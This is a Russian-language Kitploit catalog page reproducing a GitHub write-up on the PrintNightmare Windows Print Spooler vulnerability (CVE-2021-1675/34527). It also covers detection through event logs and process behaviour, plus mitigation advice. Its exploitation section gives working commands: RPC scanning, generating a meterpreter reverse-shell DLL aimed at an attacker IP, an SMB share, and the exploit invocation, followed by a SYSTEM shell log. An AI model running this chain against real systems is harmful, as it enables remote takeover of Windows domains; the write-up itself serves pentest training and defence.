Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2021-1675-PrintNightmare-Analysis — Технический разбор и анализ PrintNightmare (CVE-2021-1675 / CVE-2021-34527), охватывающий эксплуатацию RCE/LPE, обнаружение через журналы событий Windows и меры по смягчению для Print Spooler. | Kitploit
Инструменты/GitHubGitHub/velessecurity/cve-2021-1675-printnightmare-analysis
Повышение привилегийРазведкаАнализ уязвимостейЭксплуатацияТестирование на ПроникновениеСтатьи и ИсследованияОбучение и ОбразованиеРеагирование на ИнцидентыАнализ Журналов

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
GitHubvelessecurity/cve-2021-1675-printnightmare-analysis

CVE-2021-1675-PrintNightmare-Analysis

Технический разбор и анализ PrintNightmare (CVE-2021-1675 / CVE-2021-34527), охватывающий эксплуатацию RCE/LPE, обнаружение через журналы событий Windows и меры по смягчению для Print Spooler.

Репозиторий
161 месяц назадЕщё не проверено

Ресерч уязвимостей: Локальное повышение привилегий и RCE через Windows Print Spooler (PrintNightmare / CVE-2021-1675)

Репозиторий содержит подробный технический отчет (Write-up) и разбор концепта эксплуатации критической уязвимости в службе диспетчера печати Windows (Print Spooler), позволяющей низкопривилегированному доменному пользователю удаленно выполнить произвольный код с максимальными системными правами.

🛑 WARNING & DISCLAIMER: Данный материал подготовлен исключительно в образовательных целях и для проведения легитимного аудита защищенности (Pentest). Использование описанных техник против систем без предварительного письменного согласия владельцев преследуется по закону.


📌 Актуальность и контекст исследования

Уязвимости семейства PrintNightmare представляют критическую угрозу для корпоративных сред на базе Windows Server и Active Directory. Архитектурный недостаток проверки прав в RPC-интерфейсах MS-RPRN (Print System Remote Protocol) и MS-PAR (Print System Asynchronous Remote Protocol) позволяет легитимно запрашивать установку драйверов принтера на удаленном сервере.

Главная опасность заключается в том, что по умолчанию служба диспетчера печати (spoolsv.exe) активна на большинстве серверов, включая контроллеры домена (Domain Controllers), и работает в контексте наивысших привилегий NT AUTHORITY\SYSTEM. Компрометация одного низкопривилегированного аккаунта (например, через фишинг) позволяет атакующему мгновенно захватить полный контроль над всей инфраструктурой Active Directory.


🏗 Архитектура исследования и стек

  • Цель: Получение контроля над удаленным хостом Windows через RPC-интерфейсы печати.
  • Вектор атаки: RPC Remote Driver Load → DLL Injection → SYSTEM Privileges.
  • Инструменты: impacket (rpcdump, smbserver), msfvenom, Metasploit Framework, Python-эксплоит.

📈 Практический ход эксплуатации

Шаг 1. Разведка и сбор учетных данных (Reconnaissance)

Для реализации вектора удаленного выполнения кода (RCE) необходимы валидные доменные учетные данные пользователя с минимальными правами (предоставлены в условиях исследования).

  • Базовый аудит службы: Служба Print Spooler (spoolsv.exe) на целевой Windows-машине активна и работает с максимальными привилегиями SYSTEM, что открывает прямую возможность для локального повышения прав (LPE) на хосте через подгрузку недоверенной библиотеки.

Шаг 2. Сканирование RPC-интерфейсов (Scanning)

Перед запуском основного эксплоита необходимо убедиться, что удаленная машина предоставляет уязвимые протоколы печати и открыта для сетевого взаимодействия. Выполняем опрос RPC-интерфейсов целевой системы:

impacket-rpcdump @<TARGET_IP> | egrep 'MS-RPRN|MS-PAR'

Контролируемый вывод терминала:

Protocol: [MS-RPRN], Endpoint: [\pipe\spoolss]
Protocol: [MS-PAR], Endpoint: [\pipe\spoolss]
  • Инсайт этапа: Целевой хост успешно вернул строки протоколов [MS-RPRN] и [MS-PAR]. Это на 100% подтверждает, что система поддерживает необходимые интерфейсы удаленной печати и уязвима к вектору PrintNightmare.

Шаг 3. Подготовка полезной нагрузки и инфраструктуры (Weaponization)

1. Генерация вредоносной DLL с реверс-шеллом:

Создаем полезную нагрузку под архитектуру x64, указав IP-адрес нашей атакующей машины для обратного сетевого соединения:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<ATTACKER_IP> LPORT=4444 -f dll -o /tmp/malicious.dll

2. Запуск фонового слушателя в Metasploit:

msfconsole -q -x "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set LHOST <ATTACKER_IP>; set LPORT 4444; run -j"

3. Развертывание локальной SMB-шары:

Целевой сервер Windows должен иметь легитимную возможность скачать нашу DLL-библиотеку по сети без использования сторонних утилит. Поднимаем SMB-сервер с поддержкой протокола SMBv2 из папки /tmp:

sudo impacket-smbserver tmp /tmp -smb2support

Шаг 4. Эксплуатация и захват системы (Exploitation)

Выполняем Python-скрипт эксплоита, передав ему низкопривилегированные доменные учетные данные пользователя и UNC-путь к вредоносной библиотеке на нашей локальной SMB-шаре:

python3 CVE-2021-1675.py <LOW_PRIV_USER>:<PASSWORD>@<TARGET_IP> '\\<ATTACKER_IP>\tmp\malicious.dll'

Лог успешного перехвата сессии (Metasploit):

[*] Started reverse TCP handler on <ATTACKER_IP>:4444 
[*] Sending stage (200574 bytes) to <TARGET_IP>
[*] Meterpreter session 1 opened (<ATTACKER_IP>:4444 -> <TARGET_IP>:49321)

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter > shell
Process 3412 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.1935]
(c) Корпорация Майкрософт (Microsoft Corporation). Все права защищены.

C:\Windows\system32> whoami
nt authority\system
  • Результат: После вызова эксплоита удаленная служба принтера успешно подгрузила вредоносный драйвер из сетевой папки. В Metasploit открылась сессия Meterpreter со статусом наивысших привилегий NT AUTHORITY\SYSTEM. Цель полностью скомпрометирована.

🔍 Индикаторы компрометации и детектирование (Detection)

Для специалистов Blue Team обнаружение эксплуатации PrintNightmare строится на аудите системных журналов Windows и отслеживании аномальной активности процессов.

1. Мониторинг событий Windows (Event Logs)

Успешный запуск эксплоита оставляет характерные записи в журналах печати и системных логах:

  • Event ID 808 (PrintService): Регистрация сбоя или нетипичной загрузки модуля принтера. Позволяет увидеть имя подгружаемой сторонней DLL (например, из путей C:\Windows\System32\spool\drivers\x64\3\).
  • Event ID 7031 (System): Внезапная принудительная перезагрузка службы Диспетчера печати (Print Spooler), вызванная нестабильной работой эксплоита.

2. Поведение процессов (EDR / Sysmon)

  • Аномальная дочерняя активность: Появление процессов командной строки (cmd.exe, powershell.exe) или утилит сбора данных, родителем которых выступает системный процесс диспетчера печати spoolsv.exe. В легитимных условиях spoolsv.exe никогда не порождает командные оболочки.
  • Сетевая активность: Установление исходящих сетевых соединений процессом spoolsv.exe к внешним SMB-ресурсам (порт 445) для скачивания файлов драйверов.

🛡 Рекомендации по устранению уязвимости (Mitigation)

  1. Полное отключение службы (Рекомендуется): Если сервер не выполняет функции печати (особенно на Контроллерах Домена), службу Print Spooler необходимо полностью отключить и перевести в режим Disabled.
  2. Ограничение удаленной печати: Отключение возможности удаленной печати через групповые политики (GPO):
    • Computer Configuration -> Administrative Templates -> Printers -> Allow Print Spooler to accept client connections (Disabled).
  3. Установка обновлений: Своевременное накатывание официальных обновлений безопасности Microsoft (KB) для закрытия уязвимостей выполнения удаленного кода в подсистеме печати.

🔗 Полезные ссылки и материалы

  • База CVE: NIST NVD - CVE-2021-1675 | NIST NVD - CVE-2021-34527
  • Аналитические статьи: Microsoft Security Update Advisory
Скачать инструмент